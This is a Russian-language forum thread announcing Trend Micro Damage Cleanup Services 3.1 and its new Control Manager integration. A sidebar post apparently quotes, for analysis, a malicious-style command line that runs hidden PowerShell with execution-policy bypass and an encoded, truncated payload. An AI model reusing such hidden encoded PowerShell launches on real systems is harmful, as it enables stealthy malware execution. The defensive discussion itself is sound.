Перейти к содержанию
Кирилл Керценбаум

Trend Micro Damage Cleanup Services 3.1 Новая версия

Recommended Posts

Кирилл Керценбаум

Сервер Trend Micro Damage Cleanup Services удаляют на клиентах и серверах следы вирусов, червей, «шпионских» программ, «троянских коней» и записи реестра, которые не могут быть обнаружены обычными модулями антивирусного сканирования. Кроме удаления вредоносного кода, службы восстанавливают системный реестр и память, уменьшая нагрузку на администраторов, время восстановления и ущерб, нанесенный эпидемией. DCS можно настроить для автоматического устранения ущерба по расписанию или после определенного инцидента. DCS можно установить на одном сервере для автоматического устранения ущерба на компьютерах в сети независимо то того, используются ли на них антивирусные программы Trend Micro. При интеграции решения с пакетом Trend Micro InterScan Web Security Suite устранение ущерба запускается, когда «шпионское» программное обеспечение пытается передать информацию через шлюз.

Что нового:

- в данной версии DCS может быть подключен к TM Control Manager;

- администраторы могут теперь обновлять DCS engine и patterns прямо из TM Control Manager;

- интегрированная поддержка Outbreak Prevention Policies с TM Control Manager;

- все DCS сервера которые подключены к TM Control Manager посылают malware и spyware/grayware логи на TM Control Manager, таким образом пользователь может включать эти данные в консолидированные отчеты TM Control Manager;

- поддержка конфигурации как для классических продуктов через TM Control Manager.

http://www.trendmicro.com/ftp/products/dcs..._31_1123_gm.zip

http://www.trendmicro.com/ftp/documentatio...s/dcs_31_ag.pdf

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Вообщем обновление затронуло главным образом интеграцию с Trend Micro Control Manager.

А как раньше отчетность до Damage Cleanup можно было вынуть?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Кирилл Керценбаум
Вообщем обновление затронуло главным образом интеграцию с Trend Micro Control Manager.

Да раньше он управлялся только своей веб консолью, теперь она доступна через TM CM и также доступны все функции с подключенными агентами к TM CM (репликация конфигурации, логирование, консолидированная отчетность, обновление и др.)

А как раньше отчетность до Damage Cleanup можно было вынуть?

В веб консоли был (ну собственно и остался) блок отчетов. Но так как не было интеграции с TM CM то эти данные не могли попасть в консолидированный отчет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×